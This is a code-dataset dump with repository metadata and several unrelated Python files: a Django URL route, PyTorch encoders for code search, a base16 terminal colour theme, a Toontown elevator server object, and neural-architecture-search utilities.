hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0db1cd3c88ec4830d65c1a63306bb321b9c06515 | 250 | py | Python | custom/ucla/urls.py | dslowikowski/commcare-hq | ad8885cf8dab69dc85cb64f37aeaf06106124797 | [
"BSD-3-Clause"
] | 1 | 2015-02-10T23:26:39.000Z | 2015-02-10T23:26:39.000Z | custom/ucla/urls.py | SEL-Columbia/commcare-hq | 992ee34a679c37f063f86200e6df5a197d5e3ff6 | [
"BSD-3-Clause"
] | 1 | 2022-03-12T01:03:25.000Z | 2022-03-12T01:03:25.000Z | custom/ucla/urls.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
] | null | null | null | from django.conf.urls import patterns, url
# NOTE(review): `django.conf.urls.patterns` and string view references were
# deprecated in Django 1.8 and removed in 1.10; this module targets the older
# Django this project pins, so the legacy style is kept here deliberately.
urlpatterns = patterns('custom.ucla.views',
    # Matches app id plus module/form indices and dispatches to the
    # `task_creation` view (referenced by a dotted-path string).
    url(r'ucla-task-creation/(?P<app_id>[\w-]+)/modules-(?P<module_id>[\w-]+)/forms-(?P<form_id>[\w-]+)/$',
        'task_creation', name='ucla_task_creation')
)
| 35.714286 | 107 | 0.656 |
c8752abbebbdc152e3f7b13495ec5f72c74556b7 | 6,172 | py | Python | src/code_query/model/encoder.py | frans-johansson/code-query | 977e98100e1bf3b30246eee5eaa722885f2c0d41 | [
"MIT"
] | null | null | null | src/code_query/model/encoder.py | frans-johansson/code-query | 977e98100e1bf3b30246eee5eaa722885f2c0d41 | [
"MIT"
] | null | null | null | src/code_query/model/encoder.py | frans-johansson/code-query | 977e98100e1bf3b30246eee5eaa722885f2c0d41 | [
"MIT"
] | null | null | null | """
Contains various encoders for code and queries which the CodeQuery model utilizes.
"""
from abc import ABC, abstractmethod, abstractstaticmethod
from argparse import ArgumentParser, Namespace
from enum import Enum
from typing import Any, Dict, Union

import torch
from torch import nn
import pytorch_lightning as pl
from transformers import AutoModel, AutoConfig

from code_query.config import MODELS, TRAINING
class Encoder(ABC):
    """
    Base class for encoders. Can also be used to obtain relevant
    classes from a string argument via the internal `Types` enum.
    This class demands that all derived classes implement their own
    static method for argument parsing in order to provide a coherent
    training script API.
    """
    class Types(Enum):
        """Identifiers for the supported encoder architectures."""
        NBOW = "nbow"
        BERT = "bert"
        ROBERTA = "roberta"
        CODEBERT = "codebert"
        DISTILBERT = "distilbert"

    @staticmethod
    def get_type(encoder_type: Types):
        """
        Returns a class type corresponding to the given type string or enum
        """
        # All BERT-style variants share one implementation; only the neural
        # bag-of-words encoder has a dedicated class.
        if encoder_type == Encoder.Types.NBOW:
            return NbowEncoder
        else:
            return BertLikeEncoder

    # `abc.abstractstaticmethod` has been deprecated since Python 3.3;
    # stacking @staticmethod over @abstractmethod is the supported spelling
    # and behaves identically for subclass enforcement.
    @staticmethod
    @abstractmethod
    def add_argparse_args(parent_parser: ArgumentParser) -> ArgumentParser:
        """
        Should define all arguments required to initialize the derived encoder
        class in its own parser group on the parent parser, and return the parent parser
        """
        return parent_parser
class NbowEncoder(pl.LightningModule, Encoder):
    """
    Neural bag-of-words encoder: mean-pools token embeddings and projects
    the result into a fixed-size encoding space.
    """
    @staticmethod
    def add_argparse_args(parent_parser: ArgumentParser) -> ArgumentParser:
        """
        Add encoder specific arguments to a parent `ArgumentParser`
        """
        parser = parent_parser.add_argument_group("NbowEncoder")
        parser.add_argument("--embedding_dim", type=int, default=128)
        parser.add_argument("--encoding_dim", type=int, default=128)
        parser.add_argument("--encoder_dropout", type=float, default=0.1)
        return parent_parser
    def __init__(self, hparams: Union[Dict[str, Any], Namespace]) -> None:
        """
        Sets up an NBOW encoder for code and queries
        Hyperparameters:
            embedding_dim (int): Size of the embedding dimensions.
                Defaults to 128.
            encoding_dim (int): Size of the hidden dimensions for each sequence.
                Defaults to 128.
            encoder_dropout (float): Dropout rate. Defaults to 0.1.
        """
        super().__init__()
        self.save_hyperparameters(hparams)
        # Token embedding table; index 0 is the padding id and stays zero.
        # scale_grad_by_freq damps gradient updates for very frequent tokens.
        self.embed = nn.Embedding(
            num_embeddings=TRAINING.VOCABULARY.SIZE,
            embedding_dim=self.hparams.embedding_dim,
            padding_idx=0,
            scale_grad_by_freq=True
        )
        # Projects the mean-pooled embedding into the shared encoding space.
        self.fc = nn.Linear(
            in_features=self.hparams.embedding_dim,
            out_features=self.hparams.encoding_dim
        )
        self.bn = nn.BatchNorm1d(self.hparams.encoding_dim)
        self.drop = nn.Dropout(p=self.hparams.encoder_dropout)
    def forward(self, X: torch.Tensor) -> torch.Tensor:
        """
        Runs a forward pass through the encoder, producing a latent representation of the input
        Args:
            X (Tensor): A tensor of shape (B, L) representing the input sequence
                where B is the batch size and L is the sequence length of each sample
        Returns: A tensor of shape (B, H) of latent representations, where H is set by the
            `encoding_dim` hyperparameter
        """
        embeddings = self.embed(X)  # (batch, seq, embedding)
        # "Bag of words": average token embeddings over the sequence axis.
        # NOTE(review): padding embeddings are zero but still counted in the
        # mean denominator — confirm this is the intended pooling.
        nbow = torch.mean(embeddings, dim=1)  # (batch, embedding)
        hidden = self.fc(nbow)
        hidden = self.bn(hidden)
        hidden = torch.tanh(hidden)
        hidden = self.drop(hidden)
        return hidden
class BertLikeEncoder(pl.LightningModule, Encoder):
    """
    An encoder using a BERT-like embedding model, mean-pooled over the
    sequence and projected into the shared encoding space.
    """
    @staticmethod
    def add_argparse_args(parent_parser: ArgumentParser) -> ArgumentParser:
        """
        Add encoder specific arguments to a parent `ArgumentParser`
        """
        # Bugfix: the group was labelled "NbowEncoder" (copy-paste from
        # NbowEncoder.add_argparse_args); name it after this class so that
        # --help output attributes the options to the right encoder.
        parser = parent_parser.add_argument_group("BertLikeEncoder")
        parser.add_argument("--encoding_dim", type=int, default=128)
        parser.add_argument("--encoder_dropout", type=float, default=0.1)
        return parent_parser
    def __init__(self, hparams: Union[Dict[str, Any], Namespace]) -> None:
        """
        Sets up a BERT-like encoder for code and queries
        Hyperparameters:
            encoder_type (Encoder.Types): A string specifying the BERT variant to use.
            encoding_dim (int): Size of the hidden dimensions for each sequence.
                Defaults to 128.
            encoder_dropout (float): Dropout rate. Defaults to 0.1.
        """
        super().__init__()
        self.save_hyperparameters(hparams)
        # Resolve the pretrained checkpoint name for the requested variant.
        model_name = MODELS[self.hparams.encoder_type.value.upper()]
        self.embed = AutoModel.from_pretrained(model_name)
        # Project from the transformer's hidden size down to the shared
        # encoding dimension.
        self.fc = nn.Linear(
            in_features=AutoConfig.from_pretrained(model_name).hidden_size,
            out_features=self.hparams.encoding_dim
        )
        self.bn = nn.BatchNorm1d(self.hparams.encoding_dim)
        self.drop = nn.Dropout(p=self.hparams.encoder_dropout)
    def forward(self, X: torch.Tensor) -> torch.Tensor:
        """
        Runs a forward pass through the encoder, producing a latent representation of the input
        Args:
            X (Tensor): A tensor of shape (B, 1, L) representing the input sequence
                where B is the batch size and L is the sequence length of each sample
        Returns: A tensor of shape (B, H) of latent representations, where H is set by the
            `encoding_dim` hyperparameter
        """
        # Drop the singleton middle axis before feeding the transformer,
        # then mean-pool its final hidden states over the sequence axis.
        embeddings = self.embed(X.squeeze(1)).last_hidden_state  # (batch, seq, embedding)
        nbow = torch.mean(embeddings, dim=1)  # (batch, embedding)
        hidden = self.fc(nbow)
        hidden = self.bn(hidden)
        hidden = torch.tanh(hidden)
        hidden = self.drop(hidden)
        return hidden
| 37.406061 | 95 | 0.647278 |
d7fc1fee44c7b279ed857a1a5dafc557a00f54a7 | 2,391 | py | Python | base16/base16-bright.py | memeplex/base16-prompt-toolkit | 8a52f886005eb1fa005fd65a2c4b1a680a1f1d91 | [
"MIT"
] | 12 | 2017-02-27T02:03:20.000Z | 2021-04-12T08:56:46.000Z | base16/base16-bright.py | memeplex/base16-prompt-toolkit | 8a52f886005eb1fa005fd65a2c4b1a680a1f1d91 | [
"MIT"
] | 6 | 2017-02-27T19:09:13.000Z | 2020-12-18T10:47:30.000Z | base16/base16-bright.py | memeplex/base16-prompt-toolkit | 8a52f886005eb1fa005fd65a2c4b1a680a1f1d91 | [
"MIT"
] | 8 | 2018-02-08T12:49:27.000Z | 2021-12-21T12:58:27.000Z | # -*- coding: utf-8 -*-
# base16-prompt-toolkit (https://github.com/memeplex/base16-prompt-toolkit)
# Base16 Prompt Toolkit template by Carlos Pita (carlosjosepita@gmail.com
# Bright scheme by Chris Kempson (http://chriskempson.com)
from prompt_toolkit.terminal.vt100_output import _256_colors
from pygments.style import Style
from pygments.token import (Keyword, Name, Comment, String, Error, Text,
Number, Operator, Literal, Token)
# See http://chriskempson.com/projects/base16/ for a description of the role
# of the different colors in the base16 palette.
base00 = '#000000'
base01 = '#303030'
base02 = '#505050'
base03 = '#b0b0b0'
base04 = '#d0d0d0'
base05 = '#e0e0e0'
base06 = '#f5f5f5'
base07 = '#ffffff'
base08 = '#fb0120'
base09 = '#fc6d24'
base0A = '#fda331'
base0B = '#a1c659'
base0C = '#76c7b7'
base0D = '#6fb3d2'
base0E = '#d381c3'
base0F = '#be643c'
# See https://github.com/jonathanslenders/python-prompt-toolkit/issues/355
# Map the base16 palette onto prompt_toolkit's ANSI color table.  The string
# '08BADEC5379F1246' orders the base16 slots into ANSI order; presumably the
# `i + 6 if i > 8` skip leaves the intervening ANSI slots untouched — TODO
# confirm against the prompt_toolkit issue linked above.
colors = (globals()['base0' + d] for d in '08BADEC5379F1246')
for i, color in enumerate(colors):
    # Parse '#rrggbb' into integer channels.
    r, g, b = int(color[1:3], 16), int(color[3:5], 16), int(color[5:], 16)
    _256_colors[r, g, b] = i + 6 if i > 8 else i
# See http://pygments.org/docs/tokens/ for a description of the different
# pygments tokens.
class Base16Style(Style):
    """Pygments style mapping base16 palette slots onto pygments tokens."""
    background_color = base00
    highlight_color = base02
    default_style = base05
    # Syntax-highlighting roles follow the base16 styling guidelines.
    styles = {
        Text: base05,
        Error: '%s bold' % base08,
        Comment: base03,
        Keyword: base0E,
        Keyword.Constant: base09,
        Keyword.Namespace: base0D,
        Name.Builtin: base0D,
        Name.Function: base0D,
        Name.Class: base0D,
        Name.Decorator: base0E,
        Name.Exception: base08,
        Number: base09,
        Operator: base0E,
        Literal: base0B,
        String: base0B
    }
    # See https://github.com/jonathanslenders/python-prompt-toolkit/blob/master/prompt_toolkit/styles/defaults.py
    # for a description of prompt_toolkit related pseudo-tokens.
    overrides = {
        Token.Prompt: base0B,
        Token.PromptNum: '%s bold' % base0B,
        Token.OutPrompt: base08,
        Token.OutPromptNum: '%s bold' % base08,
        Token.Menu.Completions.Completion: 'bg:%s %s' % (base01, base04),
        Token.Menu.Completions.Completion.Current: 'bg:%s %s' % (base04, base01),
        Token.MatchingBracket.Other: 'bg:%s %s' % (base03, base00)
    }
| 30.653846 | 109 | 0.667921 |
c5aff79d3ee7bc7be9b1e8832547de5934e21e2f | 10,266 | py | Python | toontown/building/DistributedElevatorAI.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | 1 | 2020-09-27T22:12:47.000Z | 2020-09-27T22:12:47.000Z | toontown/building/DistributedElevatorAI.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | null | null | null | toontown/building/DistributedElevatorAI.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | 2 | 2020-09-26T20:37:18.000Z | 2020-11-15T20:55:33.000Z | from otp.ai.AIBase import *
from toontown.toonbase import ToontownGlobals
from direct.distributed.ClockDelta import *
from .ElevatorConstants import *
from direct.distributed import DistributedObjectAI
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from direct.task import Task
from direct.directnotify import DirectNotifyGlobal
class DistributedElevatorAI(DistributedObjectAI.DistributedObjectAI):
    """AI-side elevator object: tracks seat occupancy and drives the
    open/countdown/board/close finite-state machine, mirroring state to
    clients via distributed updates."""
    notify = DirectNotifyGlobal.directNotify.newCategory('DistributedElevatorAI')

    def __init__(self, air, bldg, numSeats = 4, antiShuffle = 0, minLaff = 0):
        """Create an elevator attached to `bldg` with `numSeats` seats.

        antiShuffle enables per-trip ids (anti seat-shuffling measure);
        minLaff is the minimum hitpoints required to board."""
        DistributedObjectAI.DistributedObjectAI.__init__(self, air)
        self.type = ELEVATOR_NORMAL
        self.countdownTime = ElevatorData[self.type]['countdown']
        self.bldg = bldg
        self.bldgDoId = bldg.getDoId()
        self.seats = []
        self.setAntiShuffle(antiShuffle)
        self.setMinLaff(minLaff)
        if self.antiShuffle:
            # Trip ids come from a single AIR-wide counter so every
            # anti-shuffle elevator trip is uniquely identifiable.
            if not hasattr(simbase.air, 'elevatorTripId'):
                simbase.air.elevatorTripId = 1
            self.elevatorTripId = simbase.air.elevatorTripId
            simbase.air.elevatorTripId += 1
        else:
            self.elevatorTripId = 0
        # One entry per seat; None means the seat is empty, otherwise an avId.
        for seat in range(numSeats):
            self.seats.append(None)
        self.accepting = 0
        self.fsm = ClassicFSM.ClassicFSM('DistributedElevatorAI', [State.State('off', self.enterOff, self.exitOff, ['opening', 'closed']),
         State.State('opening', self.enterOpening, self.exitOpening, ['waitEmpty', 'waitCountdown']),
         State.State('waitEmpty', self.enterWaitEmpty, self.exitWaitEmpty, ['waitCountdown']),
         State.State('waitCountdown', self.enterWaitCountdown, self.exitWaitCountdown, ['waitEmpty', 'allAboard']),
         State.State('allAboard', self.enterAllAboard, self.exitAllAboard, ['closing', 'waitEmpty', 'waitCountdown']),
         State.State('closing', self.enterClosing, self.exitClosing, ['closed', 'waitEmpty']),
         State.State('closed', self.enterClosed, self.exitClosed, ['opening'])], 'off', 'off')
        self.fsm.enterInitialState()
        self.boardingParty = None
        return

    def delete(self):
        """Tear the FSM down and release references before deletion."""
        self.fsm.requestFinalState()
        del self.fsm
        del self.bldg
        self.ignoreAll()
        DistributedObjectAI.DistributedObjectAI.delete(self)

    def setBoardingParty(self, party):
        self.boardingParty = party

    def generate(self):
        self.start()
        DistributedObjectAI.DistributedObjectAI.generate(self)

    def getBldgDoId(self):
        return self.bldgDoId

    def findAvailableSeat(self):
        """Return the index of the first empty seat, or None if full."""
        for i in range(len(self.seats)):
            if self.seats[i] is None:
                return i

    def findAvatar(self, avId):
        """Return the seat index occupied by avId, or None if not aboard."""
        for i in range(len(self.seats)):
            if self.seats[i] == avId:
                return i

    def countFullSeats(self):
        avCounter = 0
        for i in self.seats:
            if i:
                avCounter += 1
        return avCounter

    def countOpenSeats(self):
        openSeats = 0
        for i in range(len(self.seats)):
            if self.seats[i] is None:
                openSeats += 1
        return openSeats

    def rejectingBoardersHandler(self, avId, reason = 0, wantBoardingShow = 0):
        self.rejectBoarder(avId, reason)

    def rejectBoarder(self, avId, reason = 0):
        self.sendUpdateToAvatarId(avId, 'rejectBoard', [avId, reason])

    def acceptingBoardersHandler(self, avId, reason = 0, wantBoardingShow = 0):
        """Seat an approved boarder, or reject if no seat remains."""
        self.notify.debug('acceptingBoardersHandler')
        seatIndex = self.findAvailableSeat()
        if seatIndex is None:
            self.rejectBoarder(avId, REJECT_NOSEAT)
        else:
            self.acceptBoarder(avId, seatIndex, wantBoardingShow)
        return

    def acceptBoarder(self, avId, seatIndex, wantBoardingShow = 0):
        """Place avId into seatIndex and advance the FSM accordingly."""
        self.notify.debug('acceptBoarder')
        if self.findAvatar(avId) is not None:
            # Already aboard; ignore the duplicate request.
            return
        self.seats[seatIndex] = avId
        self.timeOfBoarding = globalClock.getRealTime()
        if wantBoardingShow:
            self.timeOfGroupBoarding = globalClock.getRealTime()
        self.sendUpdate('fillSlot' + str(seatIndex), [avId, wantBoardingShow])
        # First boarder starts the countdown; a full elevator leaves at once.
        if self.fsm.getCurrentState().getName() == 'waitEmpty':
            self.fsm.request('waitCountdown')
        elif self.fsm.getCurrentState().getName() == 'waitCountdown' and self.findAvailableSeat() is None:
            self.fsm.request('allAboard')
        return

    def rejectingExitersHandler(self, avId):
        self.rejectExiter(avId)

    def rejectExiter(self, avId):
        pass

    def acceptingExitersHandler(self, avId):
        self.acceptExiter(avId)

    def clearEmptyNow(self, seatIndex):
        self.sendUpdate('emptySlot' + str(seatIndex), [0,
         0,
         globalClockDelta.getRealNetworkTime(),
         0])

    def clearFullNow(self, seatIndex):
        """Vacate seatIndex and stop listening for that avatar's exit."""
        avId = self.seats[seatIndex]
        if avId is None:
            self.notify.warning('Clearing an empty seat index: ' + str(seatIndex) + ' ... Strange...')
        else:
            self.seats[seatIndex] = None
            self.sendUpdate('fillSlot' + str(seatIndex), [0, 0])
            self.ignore(self.air.getAvatarExitEvent(avId))
        return

    def d_setState(self, state):
        self.sendUpdate('setState', [state, globalClockDelta.getRealNetworkTime()])

    def getState(self):
        return self.fsm.getCurrentState().getName()

    def avIsOKToBoard(self, av):
        return av.hp > self.minLaff and self.accepting

    def checkBoard(self, av):
        """Return 0 if av may board, otherwise a REJECT_* reason code."""
        if av.hp < self.minLaff:
            return REJECT_MINLAFF
        return 0

    def requestBoard(self, *args):
        """Client RPC: the sender asks to board this elevator."""
        self.notify.debug('requestBoard')
        avId = self.air.getAvatarIdFromSender()
        if self.findAvatar(avId) is not None:
            self.notify.warning('Ignoring multiple requests from %s to board.' % avId)
            return
        av = self.air.doId2do.get(avId)
        if av:
            boardResponse = self.checkBoard(av)
            newArgs = (avId,) + args + (boardResponse,)
            # Boarding-group members must board via their group leader.
            if self.boardingParty and self.boardingParty.hasActiveGroup(avId) and self.boardingParty.getGroupLeader(avId) != avId:
                self.notify.warning('Rejecting %s from boarding the elevator because he is already part of a Boarding Group.' % avId)
                self.rejectingBoardersHandler(*newArgs)
                return
            if boardResponse == 0:
                self.acceptingBoardersHandler(*newArgs)
            else:
                self.rejectingBoardersHandler(*newArgs)
        else:
            self.notify.warning('avid: %s does not exist, but tried to board an elevator' % avId)
        return

    def partyAvatarBoard(self, avatar, wantBoardingShow = 0):
        """Board a boarding-party member on their behalf (no client RPC)."""
        av = avatar
        avId = avatar.doId
        if self.findAvatar(avId) is not None:
            self.notify.warning('Ignoring multiple requests from %s to board.' % avId)
            return
        if av:
            boardResponse = self.checkBoard(av)
            newArgs = (avId,) + (boardResponse,) + (wantBoardingShow,)
            if boardResponse == 0:
                self.acceptingBoardersHandler(*newArgs)
            else:
                self.rejectingBoardersHandler(*newArgs)
        else:
            self.notify.warning('avid: %s does not exist, but tried to board an elevator' % avId)
        return

    def requestExit(self, *args):
        """Client RPC: the sender asks to leave the elevator."""
        self.notify.debug('requestExit')
        avId = self.air.getAvatarIdFromSender()
        av = self.air.doId2do.get(avId)
        if av:
            newArgs = (avId,) + args
            if self.accepting:
                self.acceptingExitersHandler(*newArgs)
            else:
                self.rejectingExitersHandler(*newArgs)
        else:
            self.notify.warning('avId: %s does not exist, but tried to exit an elevator' % avId)

    def start(self):
        self.open()

    def enterOff(self):
        self.accepting = 0
        self.timeOfBoarding = None
        self.timeOfGroupBoarding = None
        if hasattr(self, 'doId'):
            for seatIndex in range(len(self.seats)):
                taskMgr.remove(self.uniqueName('clearEmpty-' + str(seatIndex)))
        return

    def exitOff(self):
        self.accepting = 0

    def open(self):
        self.fsm.request('opening')

    def enterOpening(self):
        self.d_setState('opening')
        self.accepting = 0
        # Bugfix: the original loop (`for seat in self.seats: seat = None`)
        # only rebound the loop variable and never emptied the seat list.
        # Clear the seats in place so a fresh trip starts empty.
        for i in range(len(self.seats)):
            self.seats[i] = None

    def exitOpening(self):
        self.accepting = 0
        taskMgr.remove(self.uniqueName('opening-timer'))

    def enterWaitCountdown(self):
        self.d_setState('waitCountdown')
        self.accepting = 1

    def exitWaitCountdown(self):
        self.accepting = 0
        taskMgr.remove(self.uniqueName('countdown-timer'))
        self.newTrip()

    def enterAllAboard(self):
        self.accepting = 0

    def exitAllAboard(self):
        self.accepting = 0
        taskMgr.remove(self.uniqueName('waitForAllAboard'))

    def enterClosing(self):
        self.d_setState('closing')
        self.accepting = 0

    def exitClosing(self):
        self.accepting = 0
        taskMgr.remove(self.uniqueName('closing-timer'))

    def enterClosed(self):
        self.d_setState('closed')

    def exitClosed(self):
        pass

    def enterWaitEmpty(self):
        self.d_setState('waitEmpty')
        self.accepting = 1

    def exitWaitEmpty(self):
        self.accepting = 0

    def setElevatorTripId(self, id):
        self.elevatorTripId = id

    def getElevatorTripId(self):
        return self.elevatorTripId

    def newTrip(self):
        """Allocate a fresh trip id from the AIR-wide counter (anti-shuffle
        elevators only) and broadcast it to clients."""
        if self.antiShuffle:
            self.elevatorTripId = simbase.air.elevatorTripId
            # Wrap the counter before it overflows the distributed int field.
            if simbase.air.elevatorTripId > 2100000000:
                simbase.air.elevatorTripId = 1
            simbase.air.elevatorTripId += 1
            self.sendUpdate('setElevatorTripId', [self.elevatorTripId])

    def setAntiShuffle(self, antiShuffle):
        self.antiShuffle = antiShuffle

    def getAntiShuffle(self):
        return self.antiShuffle

    def setMinLaff(self, minLaff):
        self.minLaff = minLaff

    def getMinLaff(self):
        return self.minLaff
| 34.449664 | 138 | 0.624002 |
8160273d132ac649ac75c6c975152f7536c3ac13 | 6,810 | py | Python | xnas/spaces/OFA/utils.py | zhengxiawu/XNAS | ea8f8ab31f67155482f5b9a9ad2a0b54c45f45d1 | [
"MIT"
] | 22 | 2020-07-01T02:12:01.000Z | 2020-09-24T05:32:08.000Z | xnas/spaces/OFA/utils.py | zhengxiawu/XNAS | ea8f8ab31f67155482f5b9a9ad2a0b54c45f45d1 | [
"MIT"
] | null | null | null | xnas/spaces/OFA/utils.py | zhengxiawu/XNAS | ea8f8ab31f67155482f5b9a9ad2a0b54c45f45d1 | [
"MIT"
] | 5 | 2020-07-09T06:53:18.000Z | 2020-08-15T13:15:14.000Z | """Utilities."""
import copy
import math
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from xnas.logger.meter import AverageMeter
def list_sum(x):
    """Sum the elements of a non-empty sequence using `+`, without assuming
    a zero element exists (works for tensors, lists, etc.)."""
    total = x[0]
    for item in x[1:]:
        total = total + item
    return total
def list_mean(x):
    """Arithmetic mean of a non-empty sequence via list_sum."""
    count = len(x)
    return list_sum(x) / count
def min_divisible_value(n1, v1):
    """make sure v1 is divisible by n1, otherwise decrease v1"""
    if v1 >= n1:
        return n1
    # Walk downwards until we hit a divisor of n1 (1 always qualifies).
    candidate = v1
    while n1 % candidate != 0:
        candidate -= 1
    return candidate
def val2list(val, repeat_time=1):
    """Normalize *val* to a list: sequences pass through (tuples are
    converted), scalars are repeated *repeat_time* times."""
    if isinstance(val, (list, np.ndarray)):
        return val
    if isinstance(val, tuple):
        return list(val)
    return [val] * repeat_time
""" Layer releated"""
def get_same_padding(kernel_size):
    """Padding that preserves spatial size for an odd kernel; accepts an int
    or a 2-tuple (handled per dimension)."""
    if isinstance(kernel_size, tuple):
        assert len(kernel_size) == 2, "invalid kernel size: %s" % kernel_size
        return get_same_padding(kernel_size[0]), get_same_padding(kernel_size[1])
    assert isinstance(kernel_size, int), "kernel size should be either `int` or `tuple`"
    assert kernel_size % 2 > 0, "kernel size should be odd number"
    return kernel_size // 2
def make_divisible(v, divisor=8, min_val=None):
    """Round *v* to the nearest multiple of *divisor*, never below *min_val*
    (defaults to *divisor*) and never more than 10% below the original value.

    Taken from the original TensorFlow MobileNet repo:
    https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py
    """
    floor = divisor if min_val is None else min_val
    rounded = max(floor, int(v + divisor / 2) // divisor * divisor)
    # Guard against rounding down by more than 10%.
    if rounded < 0.9 * v:
        rounded += divisor
    return rounded
def drop_connect(inputs, p, training):
    """Drop connect (stochastic depth) on a batch.

    Args:
        inputs (tensor: BCWH): Input of this structure.
        p (float: 0.0~1.0): Probability of dropping a whole sample's path.
        training (bool): The running mode; a no-op outside training.
    Returns:
        output: Inputs with per-sample paths randomly zeroed and the
        survivors rescaled by 1/keep_prob.
    """
    assert 0 <= p <= 1, 'p must be in range of [0,1]'
    if not training:
        return inputs
    keep_prob = 1.0 - p
    batch_size = inputs.shape[0]
    # One Bernoulli(keep_prob) draw per sample, broadcast over C/W/H.
    noise = torch.rand([batch_size, 1, 1, 1], dtype=inputs.dtype, device=inputs.device)
    binary_mask = torch.floor(keep_prob + noise)
    return inputs / keep_prob * binary_mask
""" BN related """
def clean_num_batch_tracked(net):
    """Zero the ``num_batches_tracked`` counter of every BN layer in *net*."""
    for module in net.modules():
        if not isinstance(module, (nn.BatchNorm2d, nn.BatchNorm1d)):
            continue
        if module.num_batches_tracked is not None:
            module.num_batches_tracked.zero_()
def rm_bn_from_net(net):
    """Replace every BN layer's forward with the identity (e.g. for latency
    measurement where BN is assumed fused)."""
    for module in net.modules():
        if isinstance(module, (nn.BatchNorm2d, nn.BatchNorm1d)):
            module.forward = lambda x: x
""" network related """
def init_model(net, model_init="he_fout"):
    """Initialize a network (or list of networks) in place.

    Conv2d weights get He-normal init (fan-out by default, fan-in with
    ``model_init="he_fin"``); BatchNorm/GroupNorm get weight=1, bias=0;
    Linear weights get the classic uniform(-1/sqrt(fan_in), 1/sqrt(fan_in)).
    All biases are zeroed.
    """
    if isinstance(net, list):
        for sub_net in net:
            init_model(sub_net, model_init)
        return
    for module in net.modules():
        if isinstance(module, nn.Conv2d):
            if model_init == "he_fout":
                fan = module.kernel_size[0] * module.kernel_size[1] * module.out_channels
            elif model_init == "he_fin":
                fan = module.kernel_size[0] * module.kernel_size[1] * module.in_channels
            else:
                raise NotImplementedError
            module.weight.data.normal_(0, math.sqrt(2.0 / fan))
            if module.bias is not None:
                module.bias.data.zero_()
        elif type(module) in (nn.BatchNorm2d, nn.BatchNorm1d, nn.GroupNorm):
            # Exact type check (not isinstance) kept from the original so
            # BN subclasses are deliberately left untouched.
            module.weight.data.fill_(1)
            module.bias.data.zero_()
        elif isinstance(module, nn.Linear):
            bound = 1.0 / math.sqrt(module.weight.size(1))
            module.weight.data.uniform_(-bound, bound)
            if module.bias is not None:
                module.bias.data.zero_()
def set_running_statistics(model, data_loader, device):
    """
    reset the BN statistics for different models.

    Runs a deep copy of *model* over *data_loader* with every BatchNorm2d
    forward replaced by a statistics-collecting version, then writes the
    accumulated means/variances back into *model*'s BN buffers.
    """
    # import DynamicBN here is not so elegant though :(
    from .dynamic_ops import DynamicBatchNorm2d

    bn_mean = {}
    bn_var = {}
    # Patch a copy so the original model's forwards are untouched.
    forward_model = copy.deepcopy(model)
    for name, m in forward_model.named_modules():
        if isinstance(m, nn.BatchNorm2d):
            bn_mean[name] = AverageMeter()
            bn_var[name] = AverageMeter()

            # Factory closure: binds this BN layer and its two meters so the
            # replacement forward accumulates per-layer statistics.
            def new_forward(bn, mean_est, var_est):
                def lambda_forward(x):
                    batch_mean = (
                        x.mean(0, keepdim=True)
                        .mean(2, keepdim=True)
                        .mean(3, keepdim=True)
                    )  # 1, C, 1, 1
                    # Biased variance over batch and spatial dims.
                    batch_var = (x - batch_mean) * (x - batch_mean)
                    batch_var = (
                        batch_var.mean(0, keepdim=True)
                        .mean(2, keepdim=True)
                        .mean(3, keepdim=True)
                    )
                    batch_mean = torch.squeeze(batch_mean)
                    batch_var = torch.squeeze(batch_var)
                    mean_est.update(batch_mean.data, x.size(0))
                    var_est.update(batch_var.data, x.size(0))
                    # bn forward using calculated mean & var
                    # Slicing weight/bias supports dynamic (elastic) widths
                    # where the active channel count is smaller than the
                    # layer's maximum.
                    _feature_dim = batch_mean.size(0)
                    return F.batch_norm(
                        x,
                        batch_mean,
                        batch_var,
                        bn.weight[:_feature_dim],
                        bn.bias[:_feature_dim],
                        False,
                        0.0,
                        bn.eps,
                    )
                return lambda_forward
            m.forward = new_forward(m, bn_mean[name], bn_var[name])
    if len(bn_mean) == 0:
        # skip if there is no batch normalization layers in the network
        return
    with torch.no_grad():
        DynamicBatchNorm2d.SET_RUNNING_STATISTICS = True
        for images, labels in data_loader:
            images = images.to(device)
            forward_model(images)
        DynamicBatchNorm2d.SET_RUNNING_STATISTICS = False
    # Copy the collected statistics back into the original model's buffers.
    for name, m in model.named_modules():
        if name in bn_mean and bn_mean[name].count > 0:
            feature_dim = bn_mean[name].avg.size(0)
            assert isinstance(m, nn.BatchNorm2d)
            m.running_mean.data[:feature_dim].copy_(bn_mean[name].avg)
            m.running_var.data[:feature_dim].copy_(bn_var[name].avg)
